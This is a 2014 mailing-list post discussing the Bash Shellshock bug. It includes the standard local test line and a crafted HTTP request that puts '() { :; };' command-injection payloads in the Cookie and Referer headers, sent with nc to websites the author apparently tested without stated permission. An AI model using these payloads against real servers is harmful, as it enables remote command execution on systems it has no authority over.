[Haifux] The Bash vulnerability (shellshock)
Eli Billauer
eli at billauer.co.il
Fri Sep 26 12:30:36 IDT 2014
Hi everyone,
Happy new year! To make it even merrier, it seems like a rather
widespread vulnerability, based upon a bug in Bash (!) has been discovered:
http://www.engadget.com/2014/09/25/what-is-the-shellshock/
Or for short, type this on your bash console and see if you're cooked:
env x='() { :;}; echo vulnerable' bash -c 'echo This is a test'
If it says "vulnerable" before "This is a test", welcome to the club.
Odds are it will.
So the idea is that you can execute an arbitrary command on a remote
computer, if you can add an environment variable, and kick off a bash
shell with it.
Word has it, that since the HTTP headers are passed to any CGI script as
environment variables (by Apache, for example), it's possible to use the
Referer or Cookie headers for this purpose.
So I tried this on a couple of sites (addresses mangled):
GET / HTTP/1.1
Host: thesite.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux i686 (x86_64)) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: () { :; }; ping -c 3 93.1.9.2
Referer: () { :; }; ping -c 3 93.1.9.2
and then went
nc thesite.com 80 < therequest.txt
This was supposed to trigger a ping in my direction, but it didn't.
Instead, I found the full Referer string in the access log. Apparently,
it didn't work on my first go.
Insights, anyone? Does it mean that the tested site is safe, despite the
horror stories?
Regards,
Eli
--
Web: http://www.billauer.co.il
More information about the Haifux
mailing list